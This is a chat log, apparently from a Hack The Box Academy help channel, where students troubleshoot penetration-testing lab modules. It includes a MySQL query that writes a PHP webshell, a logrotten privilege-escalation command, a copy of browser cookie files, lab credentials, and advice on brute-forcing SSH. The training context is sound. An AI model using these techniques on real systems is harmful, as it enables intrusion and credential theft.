#modules
damn this module takes ages with the community version
https://academy.hackthebox.com/module/110/section/1054
PLEASE HELP: like a few hours to scrape - please edit this section and explain it with ffuf
Burp Intruder is hella trash with the community version
Hi. On the Linux Fundamentals module, in the File System Management section, we have to look for the Size in GiB of the "/dev/sda" disk on Pwnbox. I tried "sudo fdisk -l" and "sudo fdisk -l /dev/sda" but I can't see the disk. Also tried "lsblk". Is something wrong with the section or am I missing something?
On the password module, credential stuffing, how long did it take you to brute force Kari's password? (I don't recall if that is the right name for the MySQL credentials exercise).
HI Guy.. i have ONE module left to complete the Penetration Tester Path... what advice do you have
do it
Try to do the module completely blind. Pop it open, spawn the machine, but do not read anything else in the module - not even the questions. If you can reach domain admin without having to refer to the module at all, you're in relatively good shape for the exam.
Do it blind
No idea what you are doing, but actually it went relatively quickly as far as I can remember
with ffuf it took like 3 seconds
with burp i stopped after running for an hour (not even 10% of the list were done at that point)
The module is about web proxies, so ffuf would definitely be the wrong tool
one hour?
ZAP is always an option.
Even if it would take 2 seconds for each request, you would be through after 100 seconds
Hello,
These days I experience a lot of black screens with xfreerdp in the AD labs.
Is there any workaround?
xfreerdp /u:htb-student /p:'Academy_student_AD!' /v:10.129.62.8
or without the quotes - same results.
I restarted the target and the pawn box. Same problem from my own kali machine.
Press enter?
skills assessment module user 7: "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them."
I am not sure how to authenticate the Domain controller host at 172.16.5.155 via ssh after I logged into the target host. How do I ssh to the address '172.16.5.155' if I don't know the password or username ? This skill assessment is from the 'introduction to the windows command line' module
get good notes
re this: figured out how to move files but for some reason all of the processes started from a non interactive shell die immediately (so I have been unable to upgrade the shell)
not sure if that is by design
If you're in a noninteractive shell, you could try to run a single command to add yourself to the administrators group or manipulate things that way. Figure out ways to do things without having the interactive prompt :)
https://academy.hackthebox.com/module/110/section/1055
can anyone help me with the 3rd challenge? i am having problems with encoding the 31 char md5 hash to the cookie
Hey
For this one you might need to try coding a script
I think you can do it with burp as well, just not sure
If you need help, dm me.
Hello, I create CTF challenge content for youtube and a while ago I shared a recent HTB challenge as I didn't know it wasn't allowed. Today, the challenge is already retired and I would like to know if I can re-upload the video to YouTube without violating the platform's rules. I don't know which channel to post the question on, if not here, I apologize. Thanks!
i dont have acces to rockyou.txt
is that a normal thing in the hack box
apparently i dont have permission to view file
is there a trick to it guys or just download it from github job ?
no idea anyone?
thanks im on the pwnbox in /Seclists/Passwords/Leaked-Databases/
and rockyou literally has a red x on it
and warning that i do not have permission to open this file
Try chmod?
good idea
it worked for some reason its not owned by the user its owned only by sudo group
but strange the rock you from the pwnbox found the password for exercise in less than a second
the rock you i downloaded from google spent a good 2 hours and no hit
I'm on the Password Mutations page of the Password Cracking module. The question states to mutate the password list in the resources file and then brute-force the ssh credentials of a named user. There are 94,000 passwords in the mutated list and a few hours of processing time for the brute-force.
Is this the best way forward for the module or am I missing a "Think Outside The Box" opportunity?
Which service did you try to bruteforce?
SSH
is that the only service?
The objective is to brute force the SSH credential to log in. Do other services typically share credentials?
||yeah they do, try another service||
Thank you for your help.
btw, I think chatgpt can easily write you a script to perform faster ssh bruteforce, paramiko + custom timeouts + threading should be enough
but the module wants you to use certain other tools so you can learn
no worries, dm me if something comes up
faster ssh bruteforce is a bit of an oxymoron
Hey guys, I would like to contact vautia to ask something about the new module Whitebox Attacks. I think we have one issue with the section Authentication Bypass, so I would like to ask him. If someone already solved the module as well please dm! Could someone please help with his contact?
if you think theres an issue with the module its best to either contact support or just ask for help here from someone thats finished it
Hey everyone, I'm considering the silver annual plan, but I don't really understand some of the perks listed on the website.. does anyone here have this annual subscription and would be willing to answer some questions in dms please?
Hello, I'm on Linux Privilege Escalation Module Logrotate section,
it tells me to git clone logrotten but when I did git clone https://github.com/whotwagner/logrotten.git it responds with fatal: unable to access 'https://github.com/whotwagner/logrotten.git/': Could not resolve host: github.com, anyone know what's wrong?
I found out the git clone only fails when I was on ssh
Hi
Are you trying to clone that repository into your exercise machine?
yep
I can clone it when not on ssh, but fail on ssh
Machines inside VPN cannot communicate to the outside, they can communicate to other machines within the same network. Clone that repository in your attack vm and transfer it to your target.
Your machine can communicate with the exercise's vm.
Only if you are connected to the VPN...
is it also working if I use windows?
quick question, is there another explanation why it only fail on ssh?
It's because you can't connect to github.com, it's not a part of your VPN's network. You may want to look this up, it's quite a good topic
This section is quite difficult so my suggestion is just transfer the repository and play around it
so, is there any solution I can do?
Not to my knowledge
May I ask why you want to do that?
Are you using a local VM for performing attacks or do you have pwnbox?
I'm using pwnbox
Got it
The instructor would like you to download that repo into your pwnbox
Either way: File Transfer
oh I get it
I was referring to your previous screenshots
ok thx
this?
Like you're not actually reading some of the help given to you
But generally when you're told or given a tool, it will be on your pwnbox/local vm
Generally not going to be on the target system unless specified
thx, problem solved
how long will this command take to show result?
./logrotten -p ./payload /home/htb-student/backups/access.log, been waiting still no result
Did you write an entry in the log file? Otherwise the logfile will never rotate
ok I get it, thx
after the logfile rotate, what should I do next?
I already use watch -n 1 ls -lah /etc/bash_completion.d waiting for the result, do I still have to wait or there's something I must do?
When the logfile rotates, your payload is executed
where?
No idea what is in your payload.
But as soon as the logfile rotates, what you have defined in your payload is executed.
Hi, I encountered the same problem. Did you manage to figure out what to do?
Good morning. I am having some difficulties with the knowledge check in the getting started module. I am on the last part and I am having trouble with privilege escalation after I have established a meterpreter connection.
My progress so far:
I know the username and password to log into /admin/ - This user is not able to log on to ssh though
I have gotten a meterpreter connection on the machine and I can read the user.txt flag
When I try to access root I am not able to. I have tried the following:
I searched for ssh files on the target I can use but have not been able to find any.
I can not run any equivalent to the monitor.sh from earlier in the module as sudo(as far as I can tell)
The website is extremely slow, so any file upload is out of the question it seems
I tried to get priv/getsystem in meterpreter, but no luck.
TLDR: I have shell but I need help getting root.
Any nudge in the right direction would be of great help.
I think I thought "466.344.55.34:4644" was the whole ip but 4644 in this example was the specific port you should use with eg. -p 4644 and then just 466.344.55.34 as the ip. Btw those were just example numbers
Hope it helps
Respects to you finding this message
DM me
How is the delivery of the htb certifications, if they are sent to you personally or only online?
Alright thanks
Alright thanks
provide some more details. Which module/section? what have you tried so far?
cant copy non :copy $env:APPDATA\Mozilla\Firefox\Profiles*.default-release\cookies.sqlite .
Need some help for Attacking Common Services - Easy https://academy.hackthebox.com/module/116/section/1466
||I am trying to upload a phpshell via mysql. From http://<IP>/dashboard/phpinfo.php i figured out the webroot to be C:/xampp/htdocs/dashboard/
I proceeded to upload using SELECT "<?php system($_GET['c']);?>" INTO OUTFILE 'C:/xampp/htdocs/dashboard/webshell.php';
And then tried some commands http://<IP>/dashboard/webshell.php?c=id but it didnt work
I can confirm my shell is uploaded because of the error messages when i do not supply the 'c' parameter. I also tried uploading html files and it worked fine too
Also went to the faq.html page and got
PHP:
Executable: \xampp\htdocs and \xampp\cgi-bin
Allowed endings: .php
=> basic package
Tried to read the config files like C:\xampp\php\php.ini with select LOAD_FILE but everything returns NULL||
you have found all the info you need. consider uploading to a different path
ok i solved it.. turns out im making a really silly mistake of supplying a linux command instead of a windows one
Hi,
Please, How can Enumerate the "flagDB" database and submit a flag as your answer?
On the Attacking SQL Databases
Attacking Common Services :
https://academy.hackthebox.com/module/116/section/1169
I get the password for mssqlsvc, but login failed
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'mssqlsvc'.
Try with the username .\\mssqlsvc
Can anybody help me in attacking common applications section attacking splunk i can't get a reverse shell
Im using netcat but doesn't work
does the htb team ever intend to have asia vpns for academy
Hello everyone, just looking for someone to DM real quick. I'm trying to find a Wordpress public exploit in the Pentest basics module but can't seem to find any open services. Thank you.
hi guys im on the brute force skills assesment it says to do it with hydra but im looking at a 50 h+ brute force attack and another one after it. i have a 5700xt in my pc any way i can use that to do the gruntwork ?
my Kali is in a virtual environment tho
Working on SAM password attacks module...I'm able to establish the server after making copies of sam.save, security.save and system.save. When I go to use the "move" command per the instructions, I'm getting an "access denied" error...any help would be appreciated!
can you be a bit clearer on where are you trying to "move" them? Are you trying to "move" them on your local machine?
Hi everyone, good evening. I would need some help on the Attacking SQL Databases module, I am trying to log in with the first user the one that passes the academy but apparently I can't get in. It keeps giving me the error
ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
I have tried any type of authentication and any tool, even written in the forums but nothing. Has anyone by any chance completed the challenge?
I think for this one you can find the service to exploit by || visiting the website ||
Thanks, for the answer, I just cleared it 15 seconds ago ahah, thanks for the hint though !
via smbserver.py...
Nice one
cause probably access denied is due to the unauthenticated guest transfer, I honestly don't remember the error. Can you paste the impacket-smbserver command between spoiler tags? EDIT: dm you
Im on AD Enumeration & Attacks - Skills Assessment Part II and c**** doesnt want to click my links
which user?
The first one, htdbuser that academy gave to us. I use the mssqlclient and i try every possible combination but nothing. I receive back the same error
What is the index number of the "sudoers" file in the "/etc" directory?
ls -i /etc/sudoers
what is wrong right there?
||sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/||
@fiery berry so the share is established...thought perhaps running cmd as admin would rectify the issue but no
I sent a dm
you should have already a privileged account
Time to start Dante. Let's see how it goes
are you using the pwnbox?
there is nothing wrong with the command so i thought if it was the pwnbox then refresh it but if you are using vpn it could be something else
so whats the prob?
answer is wrong
which module and section is this?
no worries mate
Does anyone here have issues with the VPN connection to HTB
Because mine is kinda tripping
change servers and/or protocols
Alright let me try that
Hey, i think I got a problem in module SHELLS & PAYLOADS > Antak
I didn't have antak installed so I installed it, and i only get:
/usr/share/nishang/Antak-WebShell/antak.aspx from locate (and find) command
I will try connecting to the academy box
Okay the academy box has it, my bad
are you trying some type of phishing with the ||CT059|| user? if so then it's the wrong path
not exactly phishing I want them to use a shortcut
not the right place for this but feel free to dm if you need help
Am i missing something here? that username isnt in the txt at all. even just looking through the entire thing with cat
wait a second i might be dumb
i think i have a typo in my note for that user but hint still that's wrong type of attack (i'll double check)
Note: just double check, if you are on question 10 that definitely isn't the right path
disregard, my ssh disconnected and i didnt realize
am dumb confirmed
on sqsh or mssqlclient ?
Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'WIN-02\mssqlsvc'.
thank you
hie
problem with VPN connection https://academy.hackthebox.com/module/144/section/1256
- already running vpn file in background
- added address in etc/hosts
$ nslookup -type=NS inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find inlanefreight.htb: NXDOMAIN
Because inlanefreight.htb isn't a registered domain
You need to do the nslookup on the ip
does anyone know what csrfmiddlewaretoken is? and will it prevent me from brute forcing a login page with hydra
Google is a useful tool
In sqsh. From my notes:
sqsh -S 10.129.203.12 -U .\\mssqlsvc -P '<password>' -h
good day friends, i am at Active Directory Enumeration & Attacks, Bleeding Edge Vulnerabilities, i am getting this error at Requesting a TGT Using gettgtpkinit.py
Figured out how to get root with php: https://gtfobins.github.io/gtfobins/php/#sudo
i tried attacking from win host, and this what i get
rdp is not up for me in the Dynamic Port Forwarding with SSH and SOCKS Tunneling section of the pivoting tunneling and port forwarding module
ive restarted the pwn box
got a new ip address but still cant connect
section isn't helping with commands
used all commands of that section and found nothing useful
obviously
idk other modules are good imo, but this one is really bad (commands are poorly described compared to others)
been stuck with this for days and learning literally nothing
Im on MSSQL of the Footprinting module and I'm logged in via mssqlclient.py . But none of my SQL commands are working. What am I doing wrong?
I also posted my issue in 'community help'
Hello, I would like to insert the file 'shell.php' present on my machine in the link of the site on the module
https://academy.hackthebox.com/module/23/section/254.
When I put my ip followed by the port and the file name, I get the following error:
Warning: include(http://xxx.xxx.xxx.xxx:xxx/shell.php): failed to open stream: Connection timed out in /var/www/html/index.php on line 47
Warning: include(): Failed opening 'http://xxx.xxx.xxx.xxx:xxx/shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/index.php on line 47
Notice: Undefined variable: p2 in /var/www/html/index.php on line 48
the xxx.xxx.xxx.xxx:xxx looks a little suspicious
anyone also got the "error: virustotal probably now is blocking our requests" with sublist3r?
Yes, you can ignore that
ahh okay
i wasn't sure, because there was no output
hmm also for other domains nothing is being output
weird
anyone experiencing something similar?
any help please
In "AD Enumeration & Attacks - Skills Assessment Part I" why I can't find t*** password, while I used mimikatz->privilege::debug->sekurlsa::logonpasswords, and also I used 'LaZagne.exe all'
You probably should modify that to remove the username, because that is one of the answers for that section. To answer your question though, mimikatz will give you the answer, but you need to run it as a user with enough permissions, and you may not have access to the machine. Check out PowerShell's ability to run commands on remote machines.
Difficulty of Q2 depends on how you did Q1. If you did it like I did, then you should have a shell on the machine with enough privileges.
Try using that shell to interact with something like PowerShell, and use some of the tools discussed to grab the SPN accounts.
Yes
https://academy.hackthebox.com/module/143/section/1423 gives some good advice for enumerating SPNs on Windows.
AD Enumeration is one of the modules that I personally found very difficult (I rate it as the hardest module). Its the only one I got stuck on for more than 1-2 days. But honestly, all the commands you need to run to find the answers are in the content. You just need to find the right one for the question.
Is there anyone who has completed the Broken Authentication Skill Assessment that I could bounce a question off of? I have completed it a while back and was reviewing it, and there is one part that I wanted to check with someone else about.
I did it awhile back. What's the question?
It might be a serious spoiler if I drop it in here, is it ok to DM you?
It wont let me send a DM to you unless you add me as a friend, I can drop it in here as well, but it would give away a big part of that assessment
Well, there seems to be an obvious thing to do then :p
There really needs to be an additional list in Discord. "People who are allowed to DM you".
Can anyone help me with these: (https://academy.hackthebox.com/module/144/section/1256)
- 1 What is the FQDN of the IP address 10.10.34.136?
- 1 What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer.
- 1 Submit the number of all "A" records from all zones as the answer.
Are you running directly from the shell, or something else?
Try running powershell from the shell
What have you tried so far?
Tried using msfvenom and meterpreter?
dig AXFR subdomain.inlanefreight.htb @target ip
nslookup -type=any -query=AXFR inlanefreight.htb 10.129.123.171
Did you run the command without first running
Add-Type -AssemblyName System.IdentityModel
And what did you find out?
Try to add the type first.
solved some questions
but can't find these ips in the list
Enumerate the NameServer better/deeper
You need to verify to post screenshots.
dig AXFR internal.inlanefreight.htb @ns.inlanefreight.htb
dig: couldn't get address for 'ns.inlanefreight.htb': not found
htb is not an official TLD and therefore cannot be resolved
Not much I can help with, unless I can see everything you're doing.
I assume that Discord ate the stars there... you should have the answer right there.
with using IP instead of FQDN still the same issue
restarting my vm, one sec
omg this DNS module gave me headaches too
Why?
well you need to pick specific list to brute force, without discord i wouldnt get it in a million years
Maybe a zonetransfer is simply not allowed
You mean the footprinting module?
No, DNS is fun
yes, sorry didn't mention
hell nah, some things were cool - but there are cooler modules for sure
This footprinting dns module, in a real world scenario, it only would work if an attacker does enumeration and zone transfer from the "trusted" machine? So it would only work if one would gain access to a machine first?
This section is about understanding that DNS is organized into zones and how they work.
You would hardly attack a DNS server like this
Ok thanx
In a real scenario, you would hardly be able to send 5000 DNS queries to the name server in such a short time. You would be blocked much earlier
idk in my experience nobody cares about dns queries
But if we talk only about the dig axfr command. It would potentially only show results if an attacker is "in the network" first?
DDoS
how short is short
Ive fired off 5k+ queries without issue plenty of times
subbrute irl go brrr
No, Normally only a secondary nameserver can perform a zonetransfer
I think it depends on the target.
But DDoS on NameServer are nasty.
yeah if you actually ddos it ofc
with which format?
its an ipmi hash, review the section notes or google 'john cracking ipmi hash'
thats definitely not correct
review the section notes
then you have to google for john to find the proper format, or follow the hashcat instructions provided
I like using this to look up what format is needed for john -> https://nth.skerritt.blog/
Name That Hash
help.
https://academy.hackthebox.com/module/54/section/490
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://94:59?FUZZ=key -fs 986
what's wrong there
are we also supposed to find subdomains/directories ?
huh?
Google it
haven't done the module, but google helps
https://gbe0.com/posts/security/cracking-ipmi-passwords/#john-the-ripper nothing from here works
Idk, but maybe the filter
could you quickly check what the url looks like
so are we supposed to recursively fuzz too?
task says to do parameter fuzzing on the target
no cracking for today
which section are you on?
You dont have to do a recursive scan
what is wrong here then?
looks right, the two things I dont know is if your filter is correct and that IP looks odd. Is that the actual ip?
no it isn't
and without the filter i just get spammed
everything in that list returns a status code 200 with length of 986
can you screen shot a snip of the output?
cant send pictures here
I think you need to be verified and then you can.
where?
I have a meeting for work I have to jump on, I'll check back when I'm done.
thanks!
i want to go to sleep
ok now
DMED
hello guys, I'm new here, and an average person in the whole field of programming, please tell me where to start, I would like to learn how to quack, hack programs, as well as write cheats / injectors for different games. Tell me, maybe some courses, programming languages , people who can teach in Ukrainian. I will be very grateful in advance!
bro dont spam every freaking channel
ok, sorry
thanks
please help me :(((
all this time no one could tell me that output from that payload for ipmi hashes exploit to get that hash would be in directory named true, i cracked it with it in 1 sec.
idk why you like to make fun of students.
Nobody made fun of you
All I said was to either follow the instructions provided in the section or if you wanted to deviate, youd have to google the difference
I never messed around with any directory named true, sounds like you did things a slightly different way than most others, good job.
@grizzled wind
who is making fun
we are all students for life here
with what?
I think the PRTG Network Monitor section in Attacking Common Services needs to be either removed or completely redone. I get different results for my VM as opposed to the pwnbox and neither one actually brings up the correct site when navigating to the provided ip address. In my VM it takes to a Splunk server whereas in the pwnbox it takes me to a Windows server. The provided username and password of prtgadmin:Password123 doesn't work on either.
Without being mean or acting as some kind of gatekeeper, things are only going to get harder from here. It would be a good idea to spend more time learning how the tools work, etc, rather than jumping straight into chat every time you immediately can't solve something.
That said, without seeing your fuzz command, I couldn't say for certain what your issue is. But there's two things that make this very solvable. First thing: You should be using the FQDN, not the IP address (modify the hosts file to add the given IP address as a reference for admin.academy.htb). Second thing is to know what the size of a failed page is. So run it, and see what the size of the failing parameters are, and then filter them out with ffuf filter options.
Do you still need help?
Does anyone know if openvpn has problems with 2019 Kali?
Cant get openvpn to connect, I started the first lesson "Meow"
I just tested it on pwnbox, and it loaded fine. Credentials also worked.
Got it. I took down the erratum post. I just don't understand why I can't get it to work either in my VM or on the pwnbox. It's really odd.
Most likely explanation is possibly config got jammed?
Id try restarting the pwnbox and close any other tabs in other chapters, and then restart the prtg machine
Did you use evil-winrm to get in? I was able to finally sign in using the pwnbox. Just into the PRTG site as an admin with the provided credentials. Evil-winrm though gives a keep alive disconnected error though.
Try CME
CME just gives me an error that the credentials are incorrect.
Well, either you modified the creds in the script, and the creds are different, or the script didnt fire.
I remember having to try a few times to get it to fire.
I'm going to give up on this for now. I was trying to help someone else out and they can't get it to work either. I'm not really sure where to begin to fix it. Thank you for trying though.
Thank you. I'll take a look at it again later when I have more time. I'm nearly finished with the Attacking Enterprise Networks module.
Okay, I'm stuck. I really don't understand this section of the Attacking Enterprise Networks. It's the Exploitation and Privilege Escalation section. The first step is to navigate to the DNN site at 172.16.8.20 on port 80 and I can see using nmap that port 80 is open. I just can't navigate to it in the browser. It gives an error of problem loading the page. Anyone seen this before and able to assist? I have a feeling that I might be missing something obvious, but it's been a very long day at work and my frustration level is pretty high.
hello everyone, I'm stuck with Password Attack Module/Network Services section
I'm trying to enumerate the WinRM user but, after several intents with different couples SecList dictionaries I can't find it
anyone can share what is the best dictionary to use?
Click the resources link at the top right, there are wordlists there for you to use
ohhhh sorry I didn't see it, ty.....
don't worry, basically everyone who has done the module has run into this issue
someone know why I get fake negative with wpscan?
and I am using the username and password which I used to log in
oh lol it works without the --password-attack xmlrpc
although xmlrpc is enabled
Hello everyone, I am stuck on the setting up module. I am trying to install ParrotOS and set up the VM but the disc image file wont show up so I can't select it, any idea on what could be going on?
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. ATTACKING COMMON SERVICES god damn i hate dns
is there anyone able to help me with that module
dm me
i might be able to
Hi, I'm on Linux Privilege Escalation - Sudo
the instruction told me to do make after git clone and cd, but it responds with this instead -sh: 43: make: not found
I tried to skip it and continue to next step and have the same problem when I'm supposed to run gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c which returns -sh: 41: gcc: not found
can anyone help me with this?
you need i think make build essentials
what?
give me a sec youre missing a dependency
ill find it for you
what is the program you want to install
try this: configure
make
make install
That pass the ticket section in Password Attacks was probably the most valuable thing in that whole module and definitely feels like it belongs in the active directory modules instead 
try this too sudo apt install build-essential
can't use sudo
are you doing this on the attack machine or on the target
target
oh
uhhh
i havent done the module yet but i can try along
dont try that technique
try the last one
hey people, I'm stuck with Password Attack Module/Network Services section
any hint how to find the Flag for the 1st question..!!!
I found the user & passwd and, get connected via evil-winrm but {I had to find some info how to use it} and when I wrote "menu" I don't know what else to do....
via xfreerdp I received a cert error message/connection unsuccessful
I tried also via smbclient {CASSIE folder} with no success either....
any hint?
Once you've connected via winrm, you have access to a noninteractive windows shell
so you just run windows commands on the command line
if you don't know how to do that, time to do some research
ok., I typed DIR & nothing happen
screenshot?
Did you make it?
Can I DM someone about the shells and payloads skill assessment? Not asking for help, wondering if something is intentional or not. nvm, definitely unintentional but we take those
+++rep @carmine hill
Bro helped me a lot explaining and was very patient with me !! I love this community!!
Anyone please give me a nudge on this osint corporate recon module question "Investigate the website www.inlanefreight.com and find out how much EBIT they recorded for the third quarter of 2020 and submit it as the answer. (Format example: GBP 000,000)"
I would begin by researching what EBIT is and where you can typically find it (for example, on what type of document or report) so you know what you're looking for. Then work the recon. This would be my approach
can i dm you ?
Sorry, no
ok thanks man
Np dude, happy to help
In the website its not in number,
Its worded. like 8 Billion, 10 Million
i too found that but don't know how to convert it to gbp
Hi, I encountered the same problem. did you manage to find out what to do?
What are your settings for the options? What output are you getting after running the exploit? I recall there was a detail that shows afterwards.
Can't remember to be honest.. I got a feeling that when I've tried to run the exploit few times after, the files did appear on my VM.
I ran this auxiliary(scanner/http/wp_simple_backup_file_read) with RHOSTS as the target IP address and RPORT as the target port specified
i received this output:
[+] File saved in: /home/htb-ac-859516/.msf4/loot/20230711064349_default_83.136.250.34_simplebackup.tra_648173.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
and opened the .txt file
but did not find anything useful from there
There's another option that should be set.
I tried both: set TARGETURI /simple-backup and set TARGETURI /root/simple-backup
I received this output for both separately:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
but was unable to find the relevant file
Finally completed the module Whitebox Attacks!!
Definitely it's the hardest module in academy till now, but the effort is well worth it!!
Congratulations for all involved, and especially for the author Vautia, incredible!
Harder than the HTTP modules?
Ouuuu
I have two more modules to finish, then I'll jump into Whitebox Attacks.
not a dir, after you scan with option output_john_hashformat you get text file named true in the same dir where you was when you start scan, if you give john that true text he will crack ipmi hashes in 1 second
sorry I am super lost. I tried to set TARGETURI to /index.php/2021/02/11/hello-world/ which was what I got from the webpage, but still did not return anything useful. I also tried to set FILEPATH to /flag.txt but encountered the same output. any hints? thank you so much!
OwO just finished the AD enum & attacks module and it looks like Im hooked now
the targeturi is not needed
Just read that one. Its my next module after Injection Attacks.
got it, thank you so much!
I'll dm you
oh yeah i use the nmap to scan and find the port
thx a lot QAQ
How am I supposed to footprint a service that isnt up on the target?
Hello guys, I have a question about Meterpreter Tunneling & Port Forwarding in the PIVOTING, TUNNELING, AND PORT FORWARDING module
I have connect the reverse shell by meterpreter but I don't get the session ID as below picture:
What makes you sure about that
It didnt come up on my NMap scans but i could connect to it
or
yeh
weird stuff
lol
Which protocol utilizes IPMI
NetBIOS?
Read the chapter once again
You're not always going to get the exact thing as examples. Just follow the instructions: where it has you input the "session" is where you put in your session id
also make sure you're doing the right commands to background the session and not close it
Ah
i need help
Just ask your question
i will
someone please explain the difference betwee NAT and Bridged in Vmware
dm you
I am attempting to download the id_rsa file from the Attacking Services - SMB module, but the file doesn't download and appears to get stuck. I'm using the following command: smbmap -H 10.129.232.131 -u jason -p XXXXXXXXXXX --download ".\GGJ\id_rsa"
you can use smbclient, while of course if you want to see how smbmap works I guess it's fine too
Hello, im at the module "Getting started" 'pentesting basics/privilege escalation'. managed to gain access as user2, but I am unsure how to proceed to escalate my privileges to root. I have explored the root directory and only found flag.txt but I am unable to read it with user2. I am also aware that there is a key and key.pub file in user1 but I am not too sure how to proceed from here. help please, thank you!
I tried smbclient and I'm getting a NT_STATUS_IO_TIMEOUT message. I even increased the threads to 60.
can you paste your smbclient between spoiler tags?
My prompt was right, but I was using a Kali box. I switched to the pwnbox and got the flag. Thanks.
There's another approach described in the section that you can use to escalate your privileges.
Absolutely, hahaha. But take your time and do it patiently, it will be fun!!
Go ahead, it will be fun!
Hey guys, a bit stuck with the logrotate lab in linux privilege escalation, I've looked through all the cron jobs, but can't find anything that looked like it was rotating quickly enough to be what we were looking for?
Try appending some data to a logfile that you think could be rotated and see what happens. The box is set up so you don't wait forever for a log to be rotated, so if you add some data, and that data eventually disappears, that's the log you want to use.
but surely theres got to be a better way of going about it than just trying to append to different log files? Like, I tried to create a 'find' script together to show me the 50 most recent files created on the system, if something is rotating, would that not show up?
happy to be wrong, just trying to think of other ways I can use to make this easier in the future
I think a find would work
The answer is like this XXX,000,000
Can someone assist with the Privileged access section of AD Enumeration and Attacks module? "What other user in the domain has CanPSRemote rights to a host?"
i did both bloodhound query and powerview query and there is only 1 user in the group and its not the right answer.
Send me a DM if you're still stuck
Hi to all! Please HELP! Stuck on third question of Living of the Land module. "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer." Just any ideas how looks this flag? dsquery command print out nothing.
Hello. I can't submit the flag in this 'meow' module in the starting point. It literally says that 'Meow root is already owned'
I have never done that machine before
Read the description of the skills assessment, it gives you some important context.
I deleted it but someone saw it. I just noticed it
@trail leaf thank youuu mate
I just lose two hours trying to craft an upload request -_-
Pretty sure the upload page doesn't have a filter though, so it shouldn't be that much harder even if you don't have context
@trail leaf maybe. It would be interesting if smn did it like this
Would anyone be able to help me out with the DNS section of the Footprinting module? Really struggling with the question "Identify if its possible to perform a zone transfer and submit the TXT record as the answer"
What exactly do you want to do? What is the problem?
The command seems to be ok so far. But without context I can't help you.
What have you tried and what doesn't work?
respawned target and added back to hosts
working fine now
Hi, I'm having problems solving the medium lab for Firewall and IDS/IPS Evasion (nmap enumeration). I've tried a ton of different things/scripts/options and I even resorted to looking up two different write ups which show slightly different output to what I'm seeing.
I have to find the target's DNS version, but all I can see is the version being 'NLnet Labs NSD' instead of the htb flag. I even copy/pasted the nmap command from the write ups with my targets IP but I don't see the htb flag as shown in the writeup
I first did a "dig axfr inlanefreight.htb @ip_address" which yielded some subdomains, then I did "dig axfr subdomain.inlanefreight.htb @ip_address" one of them gave me even more subdomains. Did the same thing on those. Then thought I needed the TXT from them so then on all of the subdomains I found I did "dig +short TXT subdomain.inlanefreight.htb @ip_address" but I got nothing from everything.
When you perform a zone transfer, TXT entries are also transferred. A zone transfer with AXFR always transfers the complete zone.
I guess I am not understanding how I am supposed to get the TXT entry that contains the flag...am I not performing the correct commands?
Nevermind...saw the flag staring right at me the whole time
hi guys im on Broken Authentication The Weak Bruteforce protection. im using the script changed it around and using an ip that i think it should trust but i think the list im using isnt right
could anyone point me in the direction of the list is it the csv from the script or is it another one and we have to edit the script function to read different files ?
can someone explain me why i need to add any subdomains found via vhost-fuzzing to hosts?
i'm mapping hostnames to the target IP, but how does this work:
it helps you resolve the names to ip address especially considering these URLS are on a private network
You can try that, but I don't think wildcard characters work in /etc/hosts
not sure of a wild card working ... try it out but then again other modules dont really share the same domain ... you will come across inlanefreight.htb
can i imagine it like this:
when i try to ping/fuzz/whatever the FQDN needs to mapped to an IP so it knows where to find the address?
and i also add any subdomain in there as the host will remain the same
not sure what you mean but once you add any domain / subdomain to the target ip it will be read off the /etc/host file
yes, but all domains/subdomains have the same host in the case above
that's what i mean
usually you only need to add one host and another subdomain per module but if there is a module that has half a dozen subdoms they just give you the list from the start so you can add them in one go ... the only hassle is everytime you refresh your target you need to update the ip
yes have experienced that too xd
I am sorry, but I don't understand what you mean. The system tells me that I already done the machine when in reality I didn't
I was responding to someone else, and they deleted their message
I don't know how to resolve your issue, but if you have the root flag, and the system says you have it, I think that's fine
Hi, could anyone guide me a bit regarding the File Inclusion Skills Assessment? I've made it all the way to the point where I only need to perform Server Log Poisoning, place a Web Shell there and then access it; the php code just doesn't get displayed or executed
Are you looking in the right spot for your shell?
hey I just realized that my discord is pulling in my old HTB account that I haven't used, not my current active one, any way to change that?
you could probably just leave the server, come back, and reverify
but wrong place to ask this
I was going to say #1024429874246590575 is a better place for this
Got it now, was indeed looking in the false spot ... or to be exactly, I just didn't find the output anymore, because it was being displayed right within the logs, so impossible to find without some highlighting along with the injection
thats what eyeballs are for
yes
is it the 10 million wordlist
try it
Hi is anyone able to help me with sau
#1127297095771099136
If you have no access, read and follow #welcome
something is shot with my FFUF - Skills Assessment - Web Fuzzing my results for question 1 return test, archive, faculty , non correct answer, hints for wordlists please.?
Finally !!!!
@mortal shadow any hints for me on Skills Assessment - Web Fuzzing - wordlists to use?
which question
1
i get archive, test and faculty as return - https://academy.hackthebox.com/module/54/section/511
try different formatting
someone could help me setting up ligolo-ng? I have always used socks or chisel
Hii all
ty
can I DM someone about AD Attacks and Enumeration module? "Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop"
DM
very cool module
@slender shoal
https://eatthebuffet.github.io/posts/Pivoting-with-ligolo/
Pivoting is an essential part of penetration testing. Once you gain an initial foothold there may be several subnets that the outside world may not have access to and will give you further access into the domain by leveraging a tool such as ligolo which can be downloaded from Github.
Linux Priv Escalation.
Logrotate.
I wget transferred all of the files for logrotten to the target. I compiled, created the payload, but when i run this code. I get an error.
I am stuck on attacking common service! I scan the machine and I got Apache web server! When I scan smtp user name, I found a user but I can't crack the password of username! Can anyone help me please?
